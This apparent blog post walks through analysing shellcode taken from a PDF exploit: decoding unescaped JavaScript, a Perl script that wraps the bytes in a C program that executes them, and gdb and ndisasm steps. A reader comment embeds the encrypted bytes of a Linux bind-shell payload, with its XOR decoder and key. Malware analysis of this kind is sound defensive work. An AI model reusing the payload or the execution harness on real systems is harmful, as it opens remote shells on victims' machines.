For this walk-through, I'll start with JavaScript that has already been extracted from a PDF file and de-obfuscated. That means this isn't step 1 of fully reversing a PDF exploit; for the earlier steps, check out Part 2 of this slide deck.
What you'll need:
- A safe place to play with exploits (I'll be using an image in VMware Workstation.)
- JavaScript debugger (I highly recommend and will be using Didier Stevens' modified SpiderMonkey.)
- Perl
- The crap2shellcode.pl script, which you'll find further down in this post
- A C compiler and your favorite binary debugger
I'll be using one of the example Adobe Acrobat exploits from the aforementioned slides for this example. You can grab it from milw0rm.
Step 1 - Converting from UTF-encoded characters to ASCII
Most JavaScript shellcode is encoded as escaped UTF-8 or UTF-16 characters (for example, %uXXXX sequences passed to unescape). It would be easy enough to write a tool to convert from any one of these formats to the \x-escaped byte format that we're used to seeing shellcode in. But because of the diversity of encoding and obfuscation showing up in JavaScript exploits today, it's more reliable to use JavaScript to decode the shellcode.
For this task, you need a JavaScript debugger. Didier Stevens' SpiderMonkey mod is a great choice. Start by preparing the shellcode text for passing to the debugger. In this case, drop the rest of the exploit, and then wrap the unescape function in an eval function:
Now run this code through SpiderMonkey. SpiderMonkey will create two log files for the eval command. The one with our ASCII shellcode is eval.001.log.
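If you want to sanity-check what the debugger gives you, here is a minimal Python sketch of what unescape does to %uXXXX sequences. It assumes the payload consists only of %uXXXX escapes and that the target is little-endian x86, so each 16-bit value lands in memory low byte first. The function name unescape_to_bytes is mine, not part of any tool mentioned here, and the sketch ignores %XX escapes and literal characters.

```python
import re
import struct


def unescape_to_bytes(escaped: str) -> bytes:
    """Turn %uXXXX escapes into the bytes they occupy in little-endian memory.

    Assumption: only %uXXXX escapes matter; anything else in the
    string is skipped rather than decoded.
    """
    out = bytearray()
    for word in re.findall(r"%u([0-9A-Fa-f]{4})", escaped):
        # "<H" packs one unsigned 16-bit value, low byte first.
        out += struct.pack("<H", int(word, 16))
    return bytes(out)


print(unescape_to_bytes("%uC92B%uE983").hex())  # prints 2bc983e9
```

This is only a cross-check. For anything obfuscated beyond plain escapes, letting a JavaScript engine do the decoding is still the more reliable route.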
Step 2 - crap2shellcode.pl
This is why I wrote this script: it takes an ASCII dump of some shellcode and automates making it debugger-friendly.
---cut---
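#!/usr/bin/perl
#
# crap2shellcode - 11/9/2009 Paul Melson
#
# This script takes stdin from some ascii dump of shellcode
# (i.e. unescape-ed JavaScript sploit) and converts it to
# hex and outputs it in a simple C source file for debugging.
#
# gcc -g3 -o dummy dummy.c
# gdb ./dummy
# (gdb) display /50i shellcode
# (gdb) break main
# (gdb) run
#
use strict;
use warnings;

# Slurp all of stdin as raw bytes, so that a 0x0a byte inside the
# shellcode does not split the dump into several "lines" and emit
# the C header more than once.
binmode(STDIN);
my $crap = do { local $/; <STDIN> };
$crap = '' unless defined $crap;
my $hex = unpack('H*', $crap);

print "#include <stdio.h>\n";
print "#include <stdlib.h>\n\n";   # needed for exit()
print "static char shellcode[] = \"";
# Walk the dump one 16-bit word (4 hex digits) at a time and swap
# the two bytes so they come out in the order they sit in memory.
for (my $i = 0; $i < length $hex; $i += 4) {
    my $first  = substr $hex, $i, 2;
    my $second = substr $hex, $i+2, 2;
    print "\\x$second" if length $second;   # odd trailing byte has no partner
    print "\\x$first";
}
print "\";\n\n";
print "int main(int argc, char *argv[])\n";
print "{\n";
print " void (*code)() = (void *)shellcode;\n";
print " code();\n";
print " exit(0);\n";
print "}\n";
print "\n";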
--paste--
The output of passing eval.001.log through crap2shellcode.pl is a C program that makes debugging the shellcode easy.
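To double-check the array the script generates, the same two steps (swap the bytes of each 16-bit word, then print every byte as a \x escape) can be sketched in a few lines of Python. This is an illustration rather than a replacement for the Perl script, and the helper names swap_words and c_literal are hypothetical.

```python
def swap_words(data: bytes) -> bytes:
    """Swap the two bytes of every 16-bit word; a trailing odd byte is kept as-is."""
    out = bytearray()
    for i in range(0, len(data) - 1, 2):
        out += bytes((data[i + 1], data[i]))
    if len(data) % 2:
        out.append(data[-1])
    return bytes(out)


def c_literal(data: bytes) -> str:
    """Format bytes as the body of a C string literal, one \\xNN escape per byte."""
    return "".join(f"\\x{b:02x}" for b in data)


print(c_literal(swap_words(b"\xc9\x2b\xe9\x83")))  # prints \x2b\xc9\x83\xe9
```

If the first few escapes printed here match the start of the shellcode[] array in the generated C file, the conversion went the way you expected.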
Step 3 - View the shellcode/assembly in a debugger
First we have to build it. Since we know that this shellcode is a Linux bindshell, the logical choice for where and how to build is Linux with gcc. Similarly, we can use gdb to dump the shellcode. For Win32 shellcode, we would probably pick Visual Studio Express and OllyDbg, though just about any Windows C compiler and debugger will work fine.
To build the C code we generated in step 2 with gcc, use the following:
gcc -g3 shellcode.c -o shellcode
The '-g3' flag builds the binary with the maximum level of debugging information (symbols, line numbers, and macro definitions). Debugging the binary is possible without it, but it's a whole lot easier with it.
Now open the binary in gdb, display the first 50 instructions at shellcode (gdb's /50i format), set a breakpoint at main(), and run it.
$ gdb ./shellcode
(gdb) display /50i shellcode
(gdb) break main
(gdb) run
Hello, nice post but you have gone slightly wrong in your approach.
When converting the original utf encoded string you need to flip the bytes so they are as they appear in memory, e.g. "%uC92B%uE983" becomes 2B C9 83 E9.
Here is a python prog to do it:
#-[foo.py begin]---------------------------#
import sys
# Bytes in the order they appear in the %u escapes (high byte first in each pair).
s1 = b"\xc9\x2b\xe9\x83\xd9\xeb\xd9\xee\x24\x74\x5b\xf4\x73\x81\x13\x13\x29\x89\x83\x57\xfc\xeb\xf4\xe2\x52\x22\x14\x7a\xe3\x40\x3d\x2b\xd1\x75\xde\xb0\x44\xf2\xc1\xa9\xdb\x50\x3f\x4f\xd5\x02\x04\x4f\x68\x9a\x31\x43\xd9\x4b\x01\x78\x68\x9a\xd7\xe4\xef\xa3\xb4\xf8\x09\xde\x05\x7b\xca\x45\xb6\xa0\xef\xa3\xd7\xe4\xe3\x80\x0e\x2b\xb6\xa3\xd7\xe4\xf0\x5a\xe7\xd0\xdb\x18\x78\x41\xfa\x3c\x3f\x41\xeb\x3c\x39\x40\x6a\x9a\x04\x7b\x68\x9a\xd7\xe4"
s2 = bytearray()
i = 0
while i + 1 < len(s1):
    # Swap each pair so the bytes come out as they sit in memory.
    s2 += bytes((s1[i+1], s1[i]))
    i += 2
# Write raw bytes; print would re-encode them and append a newline.
sys.stdout.buffer.write(s2)
#-[foo.py end]-----------------------------#
running this script to generate a binary blob:
>python foo.py > scode.bin
and disassemble the blob with ndisasm (http://www.nasm.us/):
>ndisasm -b 32 scode.bin
00000000 2BC9 sub ecx,ecx
00000002 83E9EB sub ecx,byte -0x15
00000005 D9EE fldz
00000007 D97424F4 fnstenv [esp-0xc]
0000000B 5B pop ebx
0000000C 81731313892957 xor dword [ebx+0x13],0x57298913
00000013 83EBFC sub ebx,byte -0x4
00000016 E2F4 loop 0xc
...snip....
We can see that the shellcode starts by finding its own address in memory (the fldz / fnstenv / pop ebx sequence) and then decrypts itself with an XOR loop using the key 0x57298913.
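The decoder stub in that listing can be emulated offline instead of single-stepping it. The sketch below is my reading of the disassembly, not something stated in the post: ecx ends up as 0x15, so the loop runs over 0x15 dwords; pop ebx yields the address of the fldz at offset 5, so the first XOR hits offset 5 + 0x13 = 0x18. The helper names swap_pairs and xor_dwords are hypothetical.

```python
import struct

# The bytes of s1 from foo.py, still in their pre-swap order.
S1_HEX = (
    "c9 2b e9 83 d9 eb d9 ee 24 74 5b f4 73 81 13 13 29 89 83 57 fc eb f4 e2 "
    "52 22 14 7a e3 40 3d 2b d1 75 de b0 44 f2 c1 a9 "
    "db 50 3f 4f d5 02 04 4f 68 9a 31 43 d9 4b 01 78 "
    "68 9a d7 e4 ef a3 b4 f8 09 de 05 7b ca 45 b6 a0 "
    "ef a3 d7 e4 e3 80 0e 2b b6 a3 d7 e4 f0 5a e7 d0 "
    "db 18 78 41 fa 3c 3f 41 eb 3c 39 40 6a 9a 04 7b "
    "68 9a d7 e4"
)


def swap_pairs(raw: bytes) -> bytes:
    """Swap adjacent bytes (assumes an even length, as s1 has)."""
    out = bytearray(len(raw))
    out[0::2] = raw[1::2]
    out[1::2] = raw[0::2]
    return bytes(out)


def xor_dwords(blob: bytes, start: int, count: int, key: int) -> bytes:
    """XOR `count` little-endian dwords, beginning at `start`, with `key`."""
    out = bytearray()
    for i in range(count):
        (word,) = struct.unpack_from("<I", blob, start + 4 * i)
        out += struct.pack("<I", word ^ key)
    return bytes(out)


blob = swap_pairs(bytes.fromhex(S1_HEX))
# start, count and key are read off the ndisasm listing (see the assumptions above).
payload = xor_dwords(blob, start=0x18, count=0x15, key=0x57298913)
print(payload.hex())
```

The decoded payload begins with 31 db 53 43 (xor ebx,ebx; push ebx; inc ebx), and writing it to a file lets ndisasm show the real instructions instead of the encrypted bytes.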
You're exactly right. Nice catch! I've changed my Perl code in the post so that it flips the bytes correctly.